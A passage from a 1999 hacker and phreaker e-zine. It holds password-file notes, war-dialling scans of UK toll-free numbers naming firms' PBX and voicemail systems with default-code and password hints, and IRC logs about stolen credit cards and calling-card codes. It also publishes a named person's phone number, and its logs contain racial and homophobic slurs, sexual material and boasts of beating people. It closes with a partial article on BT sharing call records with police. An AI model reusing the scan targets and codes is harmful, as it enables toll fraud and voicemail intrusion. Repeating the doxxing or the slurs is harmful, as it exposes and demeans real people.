will set their permissions automatically using this value. Passwords: a second look --oOo------------------- The system stores the user's encrypted password in the /etc/passwd file. If the system is using a shadow password system, the value placed in this field will be an x. A value of * blocks login access to the account, as * is not a valid character for and encrypted field. This field should never be edited (after it is set up) by hand, but a program such as passwd should be used so that proper encrytpion takes place. If thgis field is changed by hand, the old password is no longer valid and, more than likely, will have to be changed by root. NOTE: if the system is using a shadow password system thena seperate file exists called /etc/shadow that contains passwords (encrypted). A password is a secret set of characters set up by the user that is known only by the user. The system asks for the password, compares what is input to the known password, and, if they match, conforms that the user is who they say they are and lets them access the system. I can't stress enough - do not write down your password! it might be hard for a remote hax0r to see it but anyone at your comp will immediatley gain your permissions. Related WWW sites --oOo------------ www.l0pht.com www.rhino9.com www.cert.org www.geek-girl.com/bugtraq members.xoom.com/phuk <-- soon all tewls mentioned in this file will be here! www.rootshell.com www.epidemik.org <-- not up yet but be sure to look out for it! Basically, go to any site that offers exploits/security advisories and read them, if any are relevant to your system, make sure you install any patches available. Greets and shouts --oOo------------ Werd to the darkcyde collective, extra shouts to hybrid, bodie and force. Also greetz to [JaSuN], darkflame, xio, PUBLiC NUiSANCE, shadow, gossi, elf, downtime, kryptus, and a BIG shout to Oliver Tate....i mean erm...CFiSH..where the hell did I put his number?...ahh here it is: (+44) 0181 9798895..oops, d1d I s4y th4t 0uT l0UD?...heh (c) b4b0 1999. -----------oOo------------ EOF ------------oOo----------- ******************************** *** zomba's bonus ph0newarez *** ******************************** 895xxx Hand Scan April/May '99 by z0mba (000-310) 0800-895-004 Please Enter Pin 0800-895-006 CARRIER 0800-895-007 ? 0800-895-008 Network Associates Technical Support - www.nai.com 0800-895-011 CARRIER 0800-895-012 CARRIER 0800-895-013 Live - "OCI, this is Ron" 0800-895-014 Some shitty voice attendant - hit 0, eXt, # to xfer. 0800-895-015 Not in service. 0800-895-016 LOL 0800-895-017 Beep then live. 0800-895-020 Tightman (or summit) 0800-895-024 CARRIER 0800-895-026 beeeeep, then live 0800-895-030 CARRIER 0800-895-031 beep, beep, live (german) 0800-895-033 VMB (press #) 0800-895-035 Syflex network (?) 0800-895-036 busy 0800-895-037 beep, beep, live (german bastid!) 0800-895-038 ditt0 0800-895-039 CARRIER 0800-895-043 CARRIER 0800-895-044 German 0800-895-045 no answer 0800-895-049 Spacelabs Medical Employees line! 0800-895-050 Foreign (german?) 0800-895-051 FAX 0800-895-054 no answer 0800-895-056 PBX VMS, hit *, dial pwd, dial mailbox (strange!) 0800-895-059 VISA assistants centre 0800-895-060 loud beep, foreign, c5? 0800-895-061 AUDIX Direct, try 8xxx area 0800-895-062 8oo number cannot be reached from your calling area 0800-895-065 spanish line - time-share 0800-895-067 American Express Platinum Card service - rich cunts 0800-895-071 Please enter your PIN 0800-895-072 PBX VMS, loud clicks, press # 0800-895-076 PBX 0800-895-078 VISA Global Refund Service 0800-895-079 busy 0800-895-080 CARRIER 0800-895-081 no answer 0800-895-082 VISA International Service Centre 0800-895-084 Live 0800-895-086 PBX VMS Message Centre 0800-895-087 Live 0800-895-088 no answer 0800-895-090 PBX 0800-895-093 CARRIER 0800-895-095 VISA Global Refund Service 0800-895-099 CARRIER 0800-895-101 Please Enter Your PIN 0800-895-102 Live 0800-895-103 Live 0800-895-105 PBX - may be vms in here 0800-895-107 PBX 0800-895-108 busy 0800-895-110 PBX - press 2 for conference sales or to book a meeting! 0800-895-111 busy 0800-895-113 t0ne 0800-895-114 invalid service number 0800-895-116 no answer 0800-895-117 The number you have dialed is no longer running a promotion (?) 0800-895-118 Intec International VMB 0800-895-119 CARRIER 0800-895-120 Live 0800-895-121 The number you have dialed, 267-3551, has been changed 0800-895-122 CARRIER 0800-895-126 foreign 0800-895-128 B & B agency of Bosten 0800-895-129 Live 0800-895-130 Its a beautiful day in the villages, where may I direct your call? 0800-895-131 VMB Messagecentre 0800-895-133 CARRIER/FAX 0800-895-134 AUDIX Directo - try 5xxx, 8xxx areas 0800-895-137 Please enter your speed dial #... - cockney voice 0800-895-142 ring ring, ring ring, ring ring 0800-895-144 Live 0800-895-146 Invalid service number 0800-895-151 PBX 0800-895-152 no answer 0800-895-155 CARRIER 0800-895-156 Conference Centre 0800-895-159 Cybex International PBX 0800-895-160 no answer 0800-895-163 Live 0800-895-164 CARRIER 0800-895-165 PBX MM Switch - outdial disabled 0800-895-169 Voicemail Gateway - try 5009#, LOL! 0800-895-172 weird 0800-895-177 Live - Customer Services 0800-895-179 CARRIER on a c5 line 0800-895-181 strange 0800-895-182 Invalid service number 0800-895-183 PBX 0800-895-185 AUDIX eXt 45895 is not available 0800-895-187 answerfone www.executiveresorts.com 0800-895-188 Fax/Carrier 0800-895-191 Busy 0800-895-192 CARRIER 0800-895-193 Live 0800-895-194 CARRIER 0800-895-195 CARRIER 0800-895-198 "Hello Jennifer speaking..." 0800-895-199 Crappy PBX 0800-895-200 PBX 0800-895-201 Live 0800-895-203 # not in service 0800-895-204 just beeps 0800-895-207 KDD 0800-895-208 CARRIER 0800-895-211 KDD 0800-895-212 # disconnected 0800-895-216 Busy 0800-895-217 no answer 0800-895-218 KDD 0800-895-219 Please dial your personal ID number... 0800-895-220 Please enter your PIN 0800-895-221 Live 0800-895-222 weird beeps 0800-895-225 Please dial your personal ID number... 0800-895-226 KDD international telephone office in Japan 0800-895-227 Foreign 0800-895-228 Live 0800-895-229 no answer 0800-895-231 Please dial your personal ID number... 0800-895-232 KDD 0800-895-234 Please dial your personal ID number... 0800-895-235 KDD 0800-895-236 Please enter your card number and PIN now 0800-895-238 no answer 0800-895-240 Weird 0800-895-243 French 0800-895-244 Welcome to Access International, enter authorisation code now. 0800-895-245 KDD 0800-895-246 CARRIER 0800-895-247 Please dial your personal ID number... 0800-895-249 Please dial your personal ID number... 0800-895-250 not available from your calling area. 0800-895-251 KDD 0800-895-252 KDD 0800-895-253 no answer 0800-895-255 Christian somethin' 0800-895-256 PBX - french and english 0800-895-258 KDD 0800-895-259 no longer in service 0800-895-260 Please dial your personal ID number... 0800-895-261 KDD 0800-895-262 KDD 0800-895-263 Live 0800-895-264 ID 0800-895-265 Live 0800-895-266 ID 0800-895-267 KDD 0800-895-268 Live 0800-895-269 KDD 0800-895-271 KDD 0800-895-272 Live 0800-895-274 KDD 0800-895-276 CARRIER 0800-895-277 no answer 0800-895-278 no answer 0800-895-279 CARRIER 0800-895-280 no answer 0800-895-281 CARRIER 0800-895-284 KDD 0800-895-285 KDD 0800-895-286 no answer 0800-895-287 Live 0800-895-288 no answer 0800-895-289 KDD 0800-895-291 no answer 0800-895-292 no answer (does no-one answer the fuckin' fone anymore?) 0800-895-293 C00l, "account # and press pound", "password and press pound" 0800-895-294 KDD 0800-895-299 Commerce Bank - Live 0800-895-301 CARRIER 0800-895-302 "What Service?" 0800-895-303 CARRIER 0800-895-306 KDD 0800-895-307 CARRIER 0800-895-310 KDD -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[::[ Scan of O8OO 252 XXX ]::::::::[OO--[ by shadow-x ]---------------- -->]OO[:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: 0800252001 - bloke answered 0800252003 - fax 0800252016 - communications house answer machine 0800252020 - disaster recovery system 0800252021 - Carrier 3 login attempts 0800252022 - no answer 0800252023 - fax 0800252024 - no answer 0800252026 - no answer 0800252031 - no answer 0800252032 - live 0800252037 - answer machine 0800252038 - web bay distributers *pbx* (voice connector) 0800252039 - bitch answered 0800252040 - busy 0800252041 - live 0800252044 - guiness customer services *VMB* (infostar 24 hour) 0800252048 - bloke answered 0800252049 - no answer 0800252050 - answer machine 0800252050 - answer machine 0800252055 - no answer 0800252056 - no answer 0800252057 - fax 0800252058 - no answer 0800252059 - kelly services (answer machine 2 digit password) 0800252060 - hospital outpatients answer machine 0800252061 - no answer 0800252070 - bt answering service 0800252071 - live 0800252074 - medics assistance 0800252077 - bloke answered 0800252078 - AT&T comms 0800252079 - bloke answered 0800252080 - stationary office norwige answer machine 0800252081 - answer machine (password 12) 0800252083 - live 0800252086 - answer machine 2 digit 0800252087 - dating agency 0800252088 - hmm something automated hotline 0800252089 - live 0800252094 - no answer 0800252095 - answer machine 0800252097 - bloke answered 0800252098 - no answer 0800252099 - direct services bloke answered 0800252100 - live 0800252102 - answer machine 0800252103 - answer machine 0800252104 - answer machine 0800252105 - answer machine 0800252118 - no answer 0800252121 - (infostar vmb) 0800252125 - no answer 0800252127 - bt answer service 0800252130 - answer machine 0800252134 - no answer 0800252135 - fax service 0800252141 - sutherlands live 0800252147 - live 0800252150 - fairway legistics VMB 0800252153 - Carrier Bad case of security by obscurity (try it!) 0800252154 - fax 0800252157 - no answer 0800252158 - live 0800252160 - engaged 0800252166 - live 0800252167 - no answer 0800252168 - pbx (5402 def) old meridian 0800252170 - pbx 0800252171 - answer machine 0800252172 - live 0800252175 - live 0800252177 - live 0800252179 - answer machine 2 digit 0800252180 - live 0800252181 - answer machine 0800252183 - london uni answer machine 0800252184 - live 0800252185 - no answer 0800252188 - live 0800252192 - live 0800252193 - call diverted to answer machine 0800252195 - answer machine 0800252198 - PBX and VMB meridian 0800252200 - live 0800252201 - Carrier (Noted) 0800252210 - engaged 0800252211 - answer machine 2 digit password 0800252213 - call que 0800252215 - no answer 0800252216 - no answer 0800252217 - no answer 0800252219 - no answer 0800252220 - answer machine 0800252223 - cannon uk (answer machine)? 0800252225 - no answer 0800252226 - no answer 0800252227 - barclays pbx 0800252228 - live 0800252230 - no answer 0800252231 - barclay pbx 0800252233 - no answer 0800252235 - answer machine 0800252237 - no answer 0800252239 - live 0800252241 - no answer 0800252243 - live 0800252244 - live asks for card number 0800252247 - no answer 0800252248 - VMB 0800252250 - dead 0800252254 - college answer machine 0800252255 - VMB (infostar) 0800252257 - engaged 0800252258 - Carrier Just sits there 0800252260 - no answer 0800252261 - no answer 0800252262 - answer machine 0800252263 - no answer 0800252264 - no answer 0800252265 - no answer 0800252266 - answer machine 0800252268 - BT payphones (answer machine)? 0800252269 - PBX and VMB (infostar) 0800252270 - line busy 0800252272 - answer machine 0800252276 - barclay pbx 0800252280 - live 0800252281 - windows PBX 0800252282 - no answer 0800252283 - no answer 0800252286 - PBX 0800252289 - no answer 0800252291 - bloke 0800252292 - no answer 0800252295 - answer machine 0800252300 - live 0800252303 - no answer 0800252304 - ????? could be a pbx 0800252305 - starstruck again! 0800252307 - call queing 0800252308 - barclays 0800252312 - carrier? could be a fax 0800252317 - engaged 0800252318 - answer machine 0800252322 - engaged 0800252324 - VMB 0800252325 - no answer 0800252331 - no answer 0800252332 - no answer 0800252333 - barclays 0800252338 - no answer 0800252340 - no answer 0800252341 - no answer 0800252342 - vodaphone recall service 0800252345 - live 0800252346 - no answer 0800252348 - no answer 0800252349 - no answer 0800252351 - carrier? fucked 0800252352 - answer machine 2 digit 0800252355 - live 0800252356 - Carrier buggy 0800252357 - VMB? 0800252358 - live 0800252359 - no answer 0800252361 - live 0800252362 - live 0800252363 - Carrier disconnected now 0800252364 - answer machine 0800252365 - no answer 0800252367 - starstruck advertisment 0800252369 - answer machine 0800252374 - bt buisness training meridian 7753 no outdial 0800252380 - answer machine 0800252384 - no answer 0800252397 - answer machine 0800252399 - carrier? 0800252400 - answer machine 0800252401 - answer machine 0800252402 - no answer 0800252403 - no answer 0800252404 - answer machine 0800252405 - live 0800252406 - no answer 0800252407 - no answer 0800252408 - no answer 0800252409 - answer machine 0800252410 - VMB 0800252414 - no answer 0800252415 - answer machine 0800252416 - no answer 0800252417 - no answer 0800252418 - answer machine 0800252420 - answer machine 2 digit 0800252423 - no answer 0800252425 - VMB message center 0800252427 - no answer 0800252429 - fax? 0800252430 - no answer 0800252433 - barclays 0800252434 - no answer 0800252436 - answer machine 2 digit 0800252438 - no answer 0800252439 - live 0800252441 - no answer 0800252445 - live 0800252446 - barclay card 0800252447 - answer machine 0800252449 - no answer 0800252453 - no answer 0800252454 - fax? 0800252455 - no answer 0800252460 - no answer 0800252461 - answer machine 0800252465 - answer machine 0800252467 - live 0800252470 - extender? 0800252471 - no answer 0800252472 - live 0800252473 - no answer 0800252474 - fax? 0800252475 - answer machine 0800252477 - answer machine 0800252479 - answer machine 0800252482 - no answer 0800252485 - dating agency 0800252488 - live 0800252489 - live 0800252490 - carrier disconnected now 0800252495 - live 0800252500 - live 0800252502 - live 0800252507 - no answer 0800252511 - MERIDIAN 0800252513 - live 0800252517 - no answer 0800252518 - no answer 0800252520 - answer machine? 0800252521 - live 0800252522 - answer machine 0800252525 - engaged 0800252527 - no answer 0800252530 - answer machine 0800252531 - no answer 0800252534 - live 0800252536 - no answer 0800252538 - no answer 0800252541 - BT payphone sales 0800252544 - no answer 0800252547 - no answer 0800252548 - answer machine? 0800252549 - MERIDIAN 0800252550 - no answer 0800252552 - VMB? 0800252554 - live 0800252555 - VMB 0800252556 - no answer 0800252560 - no answer 0800252561 - PBX 0800252563 - fax 0800252567 - no answer 0800252569 - live 0800252571 - VMB 0800252573 - live 0800252579 - live 0800252584 - bt payment message line 0800252585 - no answer 0800252587 - answer machine 0800252588 - bt phoncard sales MERIDIAN 0800252592 - PBX 0800252593 - no answer 0800252594 - live 0800252596 - live 0800252597 - no answer 0800252599 - live 0800252600 - no answer 0800252601 - answer machine 0800252603 - no answer 0800252604 - no answer 0800252605 - no answer 0800252606 - fax 0800252607 - no answer 0800252608 - live 0800252609 - answer machine 2 digit password 0800252611 - no answer 0800252612 - carrier net internet, disconnects after 1 failed login 0800252613 - no answer 0800252614 - no answer 0800252615 - answer machine 2 digit 0800252617 - no answer 0800252619 - no answer 0800252623 - answer machine 3 digit 0800252624 - answer machine 0800252625 - no answer 0800252627 - no answer 0800252628 - MERIDIAN 0800252632 - no answer 0800252639 - bt payphones 0800252640 - vmb? 0800252641 - no answer 0800252642 - no answer 0800252643 - live 0800252646 - no answer 0800252649 - no answer 0800252651 - live 0800252653 - live 0800252654 - engaged 0800252658 - no answer 0800252663 - live 0800252667 - pbx 0800252668 - no answer 0800252672 - no answer 0800252674 - answer machine 0800252675 - no answer 0800252676 - live 0800252677 - live 0800252679 - no answer 0800252683 - no answer 0800252687 - answer machine 0800252688 - no answer 0800252691 - live 0800252692 - no answer 0800252695 - no answer 0800252696 - no answer 0800252697 - engaged 0800252707 - bt service managment center 0800252710 - live 0800252712 - live (some slag) 0800252713 - answer machine 0800252714 - live 0800252716 - answer machine 0800252717 - live 0800252718 - live 0800252723 - answer machine 0800252725 - engaged 0800252726 - live 0800252734 - message paging 0800252735 - live 0800252736 - VMB 0800252739 - live 0800252742 - live 0800252745 - answer machine (2 digit) 0800252746 - carrier buggy 0800252747 - argos direct 0800252750 - live 0800252751 - live ism 0800252753 - live 0800252756 - live 0800252760 - live 0800252761 - Carrier screwed 0800252762 - Carrier dodgy 0800252763 - Carrier dodgy 0800252764 - Carrier dodgy 0800252765 - answer machine 0800252769 - live 0800252772 - answer machine (password 12) 0800252773 - live 0800252775 - answer machine 0800252777 - live 0800252780 - live 0800252781 - bt customer service center 0800252783 - live 0800252784 - bt center 0800252785 - bt service managment center 0800252786 - answer machine 0800252787 - answer machine 0800252788 - live 0800252789 - answer machine 0800252793 - live 0800252795 - live 0800252796 - live 0800252801 - fax 0800252802 - fax 0800252806 - wierd hangs up after click? 0800252809 - T Mark, bloke answered 0800252816 - no answer 0800252818 - answer machine 4 digit password 0800252819 - no answer 0800252829 - no answer 0800252833 - answer machine 0800252834 - talking tesco answer machine 0800252835 - fax? 0800252836 - no answer 0800252838 - no answer 0800252839 - VMB meridian no outdial 0800252840 - hotel reservations answer machine 0800252841 - no answer 0800252842 - no answer 0800252847 - bloke answered (was not very happy with carrier tone) 0800252850 - fault 0800252851 - bitch answered 0800252853 - answer machine 0800252854 - hotel reservations answer machine 0800252855 - no answer 0800252858 - PBX 0800252859 - answer machine 0800252867 - cannot connect 0800252870 - ardvark appliances answer machine 4 digit (mail box locked) could be a VMB 0800252876 - answer machine 0800252880 - Carrier (just sits there) 0800252881 - bitch answered 0800252882 - ross helpline answer machine (could be PBX) 0800252883 - no answer 0800252884 - no answer 0800252889 - "if you are sending a fax please press the send key" 0800252890 - bitch answered 0800252892 - no answer 0800252897 - rent a car usa PBX 0800252902 - woman answered 0800252903 - Powertech information service vmb 0800252904 - no answer 0800252907 - answer machine 2 digit password 0800252908 - Carrier (Noted) netcom 0800252909 - carrier (scrolls garbage) 0800252911 - no answer 0800252912 - no answer 0800252914 - underground caverns? (*7214) 0800252917 - woman answered 0800252918 - Botanic helpline 0800252919 - opperator is engaged 0800252920 - woman answered 0800252925 - the number has changed 0800252931 - no answer 0800252935 - no answer 0800252937 - dial and message vmb? 0800252939 - no answer 0800252941 - no answer 0800252943 - wierd pippy noise (?) 0800252944 - buisness office possible vmb 0800252945 - answer machine 0800252947 - no answer 0800252948 - no answer 0800252953 - bitch 0800252958 - answer machine 0800252960 - calls are being diverted... 0800252962 - no answer 0800252963 - carrier disconnected 0800252964 - bloke answered 0800252968 - no answer 0800252972 - answer machine 0800252973 - bitch 0800252974 - bloke 0800252977 - bitch 0800252978 - no answer 0800252980 - answer machine 2 digit password 0800252986 - no answer 0800252989 - something direct (answer machine) 0800252990 - answer machine (hackable) 0800252991 - no answer 0800252992 - bitch, something hotel 0800252995 - all opperators are engaged... 0800252996 - answer machine 0800252997 - voice connector vmb 0800252999 - bloke answered -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[::[ IRC logz ]::::::::[OO--[ by various peeps ]----------------------- -->]OO[:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: fORCE's quotes of the month - READ THIS SHIT, LOL@!@!"$@!"$! --oOo---------------------- Now force comes out with some funny shit on IRC, and here is the best of it, now please remember that any references to him being gay (or me for that matter) are just *jokes* and should not be taken seriously!, a lot was taken from logs from when we were pranking various chans including #gay #gaysex and #jesus. [00:41] feckin internet explorer sucks [01:11] kinda, i had a guy telling me he was putting nutella on his dick [01:12] hehe [01:12] turned me on! funniest thing i heard all day [01:13] :) [01:13] 100% true [01:13] sick people on those lines i take it you hung up pretty sharpish [01:14] NO WAY! i ran to the kitchen and go the nutella! [01:14] got the heh [01:14] to see what i was missing out on... so you ended up with a brown knob hmm [01:15] yeah had to shower afterwards :( [01:39] browsing pr0n whilst not paying... life doesn't get any better [01:39] if i was getting head right now it would be perfect you spanking your monkey? [01:52] * fORCE- moans that'll be a yes then [01:53] no [01:53] i *was* but i was premature [01:53] :( sticky keyboard feck [01:55] pheck [01:06] ok, what music you into [01:06] ? [01:06] [01:06] The Abyssinian Baptist Gospel Choir [01:06] ? oh yeah man, they r0ck [01:07] lol [01:07] fuckin negros [01:09] well i gotta go, you greasy slut [23:28] cfish is leet i wish i was as cool as him ladyboy [23:33] word [23:34] bangkok chickboy pegleg motherfuckin' cocksucking wh0re [23:34] you know liz hurley? yeah man, fucked her last week [23:36] leet [23:36] she comes from where i live [23:41] g33k fux0r you [23:41] fr34k l4m3r [23:42] p3gl3g l4dyb0y [23:42] b4ngk0k ch1ckb0y [23:44] now i'm really off [23:44] the net sucks [23:44] i'm never coming back [23:44] send me some voice mail nigger [23:44] and include c0dez in them yeah right [00:40] oi [00:40] pencil dick y0y0 l4m3w0d [00:41] p3nc1ld1c|< [00:42] what up nothin [00:43] got any <0d3z? [23:29] why 2 of you? the other is a shell [23:30] i see [23:31] said the blind man to his deaf dog [01:04] you are an experiance rider of the chocolate highway [01:04] i have a gimp suit [01:04] they are ereet [01:38] i love the advery [01:39] advert [01:39] ooooooooh eight niiiine ooooone FIFTY! FIFTY! FIFTY! [01:39] i called it once through a pbx i know nutella on dick incident [01:40] haha [01:40] did i tell ya about me hearing that cfish lamer on there? no [01:41] i heard his voice before on vmbs and i knew his name and this guy on 0891505050 says "its ollie i'm busting for it so please message me girls" [01:41] i swear it was him [01:41] i messaged him but he went straight away [22:14] hey [22:14] i love a big veiny cock in my ass [22:14] i like gangbangs...anyone else? [22:14] i lost my anal virginity to my dog [22:15] i got gang raped once by a gang of 1O year olds * fORCE is now known as fatb0y [02:27] i stared at all the boys in the changing rooms and the showers [02:27] i got an erection [02:27] and they called me 'boner boy' for the rest of my school life [02:28] i feel so bad [02:28] considered suicide [02:28] didn't work [02:28] so i went to this gay bar [02:28] and met some really *nice* people [02:28] one was called 'ian' [02:28] he took me back to his place and we 'played around' [02:29] then he started getting rough [02:29] and pinned me down [02:29] and penetrated my anus hole [02:29] it felt so good [02:29] but it also hurt [02:29] i bled a fair bit [02:29] do you like to get fucked? [02:29] i still get discharge [02:29] it was nice [02:29] and yes i do [02:30] i wish i had a vagina [02:30] so much [02:30] so do you guys bleed a lot? [02:30] or am i a freak? [21:31] my mum rekons jesus was an alien [21:32] NM: it would be impossible for that to be done and for a huge inverse parralelism to occur [21:32] *** Quits: NM (Leaving) [21:32] i read that jesus was a mafia boss once [21:32] hahhaha [21:34] i read that jesus likes it hardc0re up his rear dorr [21:34] door even TONEKILLA } b1tch1ng ----------------- (tonekill4): why have you been such a bitch to me recently? ([JaSuN]): eh? ([JaSuN]): i have not ([JaSuN]): if you mean about darkcyde - hybrid told me who to allow ops via bot (tonekill4): have too (tonekill4): removing me from op (tonekill4): and shit ([JaSuN]): look dude, its not upto me (tonekill4): thats being a bitch ([JaSuN]): well...not my choice (tonekill4): specially when everyone was turning on me (tonekill4): haha (tonekill4): hybrid says jump ([JaSuN]): besides, even if you have op on fatality...slut would deop you (tonekill4): everyone follows the master god's command (tonekill4): i fucking ran that hcnanel for 2 months (tonekill4): kept you and your bot opped (tonekill4): and then bewm&(*!^$#*&&$*&# ([JaSuN]): sorry...i don't have any say (tonekill4): well... (tonekill4): still... ([JaSuN]): i just put the fucking thing in there ([JaSuN]): sorry! (tonekill4): i mean i fucking ran that channel with no problem (tonekill4): then all the sudded ([JaSuN]): tell hybrid then (tonekill4): everyone fucking jumps around hybrid like he's god and just fucking turns on me (tonekill4): i cant talk to him (tonekill4): he has me on ignore (tonekill4): so i cant work the shit out (tonekill4): i halfway told him completly how to run a bot (tonekill4): he asked me ? after ? (tonekill4): and i helped him (tonekill4): then all the sudded, he starts ([JaSuN]): owww. (tonekill4): and when i ban him back, he kicks me out (tonekill4): and takes me off op and shit ([JaSuN]): i see. (tonekilla): but, since you are one of hybrid's adoring fans, forget it. ([JaSuN]): look (tonekilla): and downtime is my fucking best friend ([JaSuN]): i don't support anyone or anything... (tonekilla): and he does the same ([JaSuN]): i just was told who to give ops, thats all. ([JaSuN]): I don't stick up for anyone against other ppl I know and I don't like arguments about it! (tonekilla): ok (tonekilla): ok ([JaSuN]): so.. ([JaSuN]): i am still kewl with you, I have no problems. (tonekilla): well ok (tonekilla): i guess i remove ban then heh (tonekilla): i thought it was your idea (tonekilla): => ([JaSuN]): about what?! (tonekilla): come in (tonekilla): #telkore (tonekilla): oh (tonekilla): and do you know the command on an old v. eggie to list all the channels its in? ([JaSuN]): .status ([JaSuN]): that will tell you (tonekilla): thanx ([JaSuN]): np (tonekilla): yay (tonekilla): heh (tonekilla): i had forgotton a channel --------------------- SPOT THE WORD _FUCK_ IN #darkcyde } we all need to learn some manners.. tonekilla is a fuckin moron fucker i fucking keep my homewerk on there thats fucking lame... packet kiddies are coming at me for no real reason tonight force is a fuckin p4k13 woops fucking script let me fix this *xio* which fucking sucks, heh. fuckin' shit fuck <[JaSuN]> fucking thing fuck sake my sounddev is fucked right now.. doesn't work . <[JaSuN]> gimme fuckin greetz# i need a fucking linerec in. <[JaSuN]> fuckin text flood y0 <[JaSuN]> fuck the song err fuck god fucking damnit. i'm fucking pissed fucking idiot THE FUCKING MUD * hybrid- wonders what the fuck is going on * hybr1d is away: (fucks sake) [BX-MsgLog On] stupid fuckin bot *oclet* you fucked up too? <[JaSuN]> to much time in front onf fuckin pc's fuck fuckin playing football i want a fucking nurse to no, so fuck off l4m3r fuckin fast car yo werd up k4t fuX0r1ng, h4mpstuH li#1ck1ng, d0g a$$ sn1ffing, g3rb1l r4pp1nG, m0nk3y fucK1nG, m0th3rfuck3rZ? I hate that fucking Fatality what the fuck hybrid? heh What the fuck is up jason. well FUCK YOU FUCK YOU NO FUCK YOU fuck who fucken cares tk i dont give a fuck tk: don't fuck with nino bitch ill tell u to relax if i fucken feel like it FUCK YOU NINO IS MY FUCKING BRO IM NOT FUCKING WITH HIM fuck, ch1ckie has her pms and everyone jumps on my back what the fuck is going on now? another fucking fight? ch1ckie started it.... and no one fucking gives a shit damn.. i would fuck mary jane in a heart beet you dont fuckng ban someone with everything that happens motherfuckers stop WHAT THE FUCK IS WRONG WITH YOU PEOPLE?! if you dont agree with me, fuck off ;P dude i am just fucken with ya And I ain't really never gave a fuck how niggaz feel * hybrid_ is wondering what the fuck is going on with these ppl EVERYONE SHUT THE FUCK UP fuck you you didnt get banned for no fucking reason from a channel you properly ran for 3 months then someone comes in, kicks and bans you and fucking turns it into a dynasty *downtime-* what the fuck is going on?! tone shut the fuck up for fucks sake, its only irc FUCK YOU WHAT THE FUCK OClet fuck the big yellow this flaw is so fucking simple. fuck it's all fucked irc = fucked, all day, everyday:) fucking good stuff. fuck got fuck loads of cc cards get speech pro u lazy fuck all these fucking kodes still work fucked off fucking poor NT admins FUCKING HUGE BILL~!~# mother fucker more cf1sh logz } this kid called me weired, i dunno why!@" - hybrid --------------- Session Start: Sun May 16 15:21:22 1999 sup? [15:21] ok well not really [15:21] did you put up the thing on barby.org nope jasun did [15:22] why cos ur lame i guess [15:22] why you reckon that i thought we were talking about why jase put it up not what i thought [15:24] ok fine but personnaly what do you think pretty much the same thing you haven't done anything to prove yourself otherwise [15:25] lame or just nothing lame [15:26] but why i dont get it your ereet man, read faith 5 when its out [15:27] when its out i will but why you reckon im lame? just do [15:28] there must be a reason [15:28] i barely know you aww, poor little diddums dood? why u cry about it? [15:33] yes prove me wrong [15:33] just a bit annoyed [15:33] you cant trust anyone i know [15:34] what you want me to do give you 3 outdials a world calling card ~voice mail boxes etc? [15:34] lol lamer outdials and vms's are lame my mum could get them [15:34] i know vms's are lame show me u r eleet [15:35] you call a way of grabbing calling cards from 2 meters away from a payphone and having it displayed on a lcd display lame? yup [15:36] im glad your so eleet why thankyou, so am I come on man, prove me wrong [15:36] so could you do that with the calling cards? prove you can grab calling cards from 2 meters away and have it displayed on an LCD and i won't think u are so lame [15:37] good i will and then prove yourself properly [15:37] you know hearing aids [15:37] set to mode T [15:37] they can pick up phone conversations lame everyone knows that [15:38] i know that is in loads of old skool texts [15:38] but if you make a circuit... tell me something thats *not* lame [15:38] that reckognises when you press 144 [15:38] and then decodes the rest until you press stop [15:38] and displays it on a LCD [15:38] is that lame give me circuit schematics then cos that don't prove nothing i could say "make a circuit that decodes secret MI5 government transmission", but that wouldn't make me eleet would it *prove* remember that word? [15:41] true but im working on it so you haven't actually done it yet? [15:41] no [15:41] but in theory it will work l4m3r [15:42] but now im not going to publicise it lots of things werk in theory [15:42] true and lots in practise as well shame u r so lame really isn't it so basically, all u want is phr33 calls lame lame lame [15:42] ask the person who helped you make uphreak.8m.com if im lame *** <=- �SD v8.5 PrO� -=> (cfish) Is Not On IRC Right Now ! *** <=- �SD v8.5 PrO� -=> (cfish) Is Not On IRC Right Now ! Session Close: Sun May 16 15:43:21 1999 downt1me } this dude is EV1l, evil i tell ya.. ------------- I kicked the kid's ass I got my foot, and placed it on his forehead ;) then i got my fist and beat his face to shit. LOL you're an animal lol it was fun.. indeed.. :> no one fucks with me.. ;) same here cuz i wil grab a chair and hit them with it or a pencil or anything! LOL! the best thing to do is always if ya dont have a clear shot to the head, go for the knees. ;) take them down.. then kick the shit outta them then get a pipe and break it over their backs LOL -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[::[ BT conspiracy ]::::::::[OO--[ postal phreak ]--------------------- -->]OO[:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ANYONE READING this may already have had details of who they telephone or are phoned by fed into police computer files, it emerged last week after details of automatic links between BT and police computers were described in public for the first time. Delegates to an international conference on economic crime in Cambridge were told that the number of requests for BT data from the police and other agencies was doubling every year, and could involve thousands of people in the course of just one investigation. Not just phone calls are now logged into police computers, it was revealed. All vehicles entering or leaving the City of London or British seaports are being watched by robot automatic number plate scanners (ANPS), which feed the data to the Police National Computer (PNC) in Hendon. The PNC replies within five seconds if the vehicles are of interest to police. Daryl Godivala, head of BTs Network Special Investigations Department, explained to the conference that BT has met ever-increasing police demands for details of customers calls by installing an automated computer-to-computer interface to feed call information out. Unlike telephone tapping, warrants are not required before confidential data is sent out by BT. All British telecommunications operators, including mobile phone airtime suppliers, are storing and handing over this information, although only BT runs an automated system. BT says this has been done to minimise cost in the face of escalating and hitherto uncoordinated police requests. Other UK telecommunications companies and mobile phone operators normally supply data only on paper. Currently, BT receives and processes about 1,000 requests a week, Godivala indicated. Most requests were for details of subscribers names and addresses, he said, rather than the numbers they had called. But the traffic in personal call information is already so large that two British firms have produced special software to automatically process BT telephone call data for intelligence purposes. These systems - called iTel and CaseCall - are currently used by every British police force, as well as by Customs, MI5 and the National Criminal Intelligence Service. Once received, the data is sifted and transformed into pictorial networks and charts of who talks to whom. To these are added bank records, housing information, vehicle details, and information from inquiries, newspapers, the Net and informants. The resulting charts are often so comprehensive and complex as to back up the most robust of paranoid nightmares. But is it only the guilty who have cause to be worried about the new intelligence systems? According to intelligence analysts who have designed and used telephone call analysis systems, a single investigation - particularly drugs cases - can eventually result in requests for information about calls made by hundreds or even thousands of telephone customers. Names and addresses of customers called by a suspect are traced and fresh requests sent in to get their calls. The result is an ever-widening circle of people who have been called by people who have been called (and so on) by the original suspect. One Cambridge detective present claimed that this method had worked well for his force after he had downloaded information on thousands of calls and used it to help break a computer theft 